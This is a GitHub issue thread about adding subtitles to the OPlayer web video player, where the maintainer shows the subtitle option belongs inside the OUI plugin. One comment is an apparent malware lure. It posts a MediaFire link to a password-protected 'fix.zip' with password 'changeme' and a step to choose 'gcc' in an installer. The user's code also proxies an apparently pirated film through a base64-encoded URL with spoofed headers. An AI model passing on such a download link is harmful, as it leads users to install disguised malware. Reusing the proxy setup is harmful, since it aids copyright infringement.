### ISSUE TITLE
subtitles

### ISSUE THREAD

**Issue by Tommy0412** [shiyiya/oplayer#134]
how to add subtitles?
my code is like this : 
```
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="robots" content="noindex, nofollow">
  <meta name="referrer" content="origin">
  <title>Video Player</title>
<script src="[/static/player.core.js?v2.7.19](http://localhost/static/player.core.js?v2.7.19)"></script>
<script src="[/static/player.ui.js?v2.7.19](http://localhost/static/player.ui.js?v2.7.19)"></script>
<link rel="stylesheet" href="[/static/embed.css?v2.7.19](http://localhost/static/embed.css?v2.7.19)">
</head>
<body>
 
<div id="oplayer" />
 <script src="[/static/plugins.js?v2.7.19](http://localhost/static/plugins.js?v2.7.19)"></script>
<script>
  OPlayer.make('#oplayer', {
    source: {
	  title: '',
      src: 'http://localhost/video_proxy.php?data=aHR0cHM6Ly9zMDEuZXBsYXl2aWQubmV0L3ZpZHMvZnVyaW9zYS5hLm1hZC5tYXguc2FnYS4yMDI0LjEwODBwLndlYnJpcC54MjY0LmFhYzUuMV9fXzY2Nzk0ODUxOTNmY2MubXA0fFJlZmVyZXI9J2h0dHBzOi8vZXBsYXl2aWQubmV0Lyd8VXNlci1BZ2VudD0nTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6MTA5LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMTI2LjAnfE9yaWdpbj0naHR0cHM6Ly9lcGxheXZpZC5uZXQvJw==',
      poster: ''
    },
	subtitles: {
      source: [{"src":"https:\/\/s.eplayvid.net\/667957dd5c80b.vtt","name":"English"},{"src":"https:\/\/s.eplayvid.net\/667957ebd26a2.vtt","name":"Spanish"},{"src":"https:\/\/s.eplayvid.net\/667957e50877e.vtt","name":"Korean"},{"src":"https:\/\/s.eplayvid.net\/667957f34c460.vtt","name":"Norwegian"}]  
     }
  })
    .use([OUI()])
    .create()
</script>
</body>
</html>
```

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by shiyiya** [comment]
https://github.com/shiyiya/oplayer/blob/d0953b558feb05bef056f11e97f91caf486bf3dc/examples/vue/src/OPlayer.vue#L44

**Comment by Tommy0412** [comment]
> https://github.com/shiyiya/oplayer/blob/d0953b558feb05bef056f11e97f91caf486bf3dc/examples/vue/src/OPlayer.vue#L44

that doesenet help me, why its so complicated? i will just use jw player :D

**Comment by shiyiya** [comment]
It's just the parameter positions that need to be adjusted

**Comment by shiyiya** [comment]
`

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="robots" content="noindex, nofollow">
  <meta name="referrer" content="origin">
  <title>Video Player</title>
<script src="[/static/player.core.js?v2.7.19](http://localhost/static/player.core.js?v2.7.19)"></script>
<script src="[/static/player.ui.js?v2.7.19](http://localhost/static/player.ui.js?v2.7.19)"></script>
<link rel="stylesheet" href="[/static/embed.css?v2.7.19](http://localhost/static/embed.css?v2.7.19)">
</head>
<body>
 
<div id="oplayer" />
 <script src="[/static/plugins.js?v2.7.19](http://localhost/static/plugins.js?v2.7.19)"></script>
<script>
  OPlayer.make('#oplayer', {
    source: {
	  title: '',
      src: 'http://localhost/video_proxy.php?data=aHR0cHM6Ly9zMDEuZXBsYXl2aWQubmV0L3ZpZHMvZnVyaW9zYS5hLm1hZC5tYXguc2FnYS4yMDI0LjEwODBwLndlYnJpcC54MjY0LmFhYzUuMV9fXzY2Nzk0ODUxOTNmY2MubXA0fFJlZmVyZXI9J2h0dHBzOi8vZXBsYXl2aWQubmV0Lyd8VXNlci1BZ2VudD0nTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6MTA5LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMTI2LjAnfE9yaWdpbj0naHR0cHM6Ly9lcGxheXZpZC5uZXQvJw==',
      poster: ''
    },
// subtitle not here

  })
    .use([OUI({
// its here 
    subtitle: {
      source: [{"src":"https:\/\/s.eplayvid.net\/667957dd5c80b.vtt","name":"English"},{"src":"https:\/\/s.eplayvid.net\/667957ebd26a2.vtt","name":"Spanish"},{"src":"https:\/\/s.eplayvid.net\/667957e50877e.vtt","name":"Korean"},{"src":"https:\/\/s.eplayvid.net\/667957f34c460.vtt","name":"Norwegian"}]  
     }
    }

)])
    .create()
</script>
</body>
</html>

`

**Comment by Tommy0412** [comment]
> ```
> <!DOCTYPE html>
> <html lang="en">
> <head>
>   <meta charset="UTF-8">
>   <meta name="viewport" content="width=device-width, initial-scale=1.0">
>   <meta name="robots" content="noindex, nofollow">
>   <meta name="referrer" content="origin">
>   <title>Video Player</title>
> <script src="[/static/player.core.js?v2.7.19](http://localhost/static/player.core.js?v2.7.19)"></script>
> <script src="[/static/player.ui.js?v2.7.19](http://localhost/static/player.ui.js?v2.7.19)"></script>
> <link rel="stylesheet" href="[/static/embed.css?v2.7.19](http://localhost/static/embed.css?v2.7.19)">
> </head>
> <body>
>  
> <div id="oplayer" />
>  <script src="[/static/plugins.js?v2.7.19](http://localhost/static/plugins.js?v2.7.19)"></script>
> <script>
>   OPlayer.make('#oplayer', {
>     source: {
> 	  title: '',
>       src: 'http://localhost/video_proxy.php?data=aHR0cHM6Ly9zMDEuZXBsYXl2aWQubmV0L3ZpZHMvZnVyaW9zYS5hLm1hZC5tYXguc2FnYS4yMDI0LjEwODBwLndlYnJpcC54MjY0LmFhYzUuMV9fXzY2Nzk0ODUxOTNmY2MubXA0fFJlZmVyZXI9J2h0dHBzOi8vZXBsYXl2aWQubmV0Lyd8VXNlci1BZ2VudD0nTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6MTA5LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMTI2LjAnfE9yaWdpbj0naHR0cHM6Ly9lcGxheXZpZC5uZXQvJw==',
>       poster: ''
>     },
> // subtitle not here
> 
>   })
>     .use([OUI({
> // its here 
>     subtitle: {
>       source: [{"src":"https:\/\/s.eplayvid.net\/667957dd5c80b.vtt","name":"English"},{"src":"https:\/\/s.eplayvid.net\/667957ebd26a2.vtt","name":"Spanish"},{"src":"https:\/\/s.eplayvid.net\/667957e50877e.vtt","name":"Korean"},{"src":"https:\/\/s.eplayvid.net\/667957f34c460.vtt","name":"Norwegian"}]  
>      }
>     }
> 
> )])
>     .create()
> </script>
> </body>
> </html>
> 
> `
> ```

still the same, not working.

**Comment by shiyiya** [comment]
check doc - script tab

https://oplayer.vercel.app/docs/guide/start/

**Comment by Tommy0412** [comment]
figured it out, problem was in .js files which i took from vidsrc.pro, work fine with code in documentaion, but player from that page look better, does this player have skins?

**Comment by shiyiya** [comment]
it default skin. u can copy code
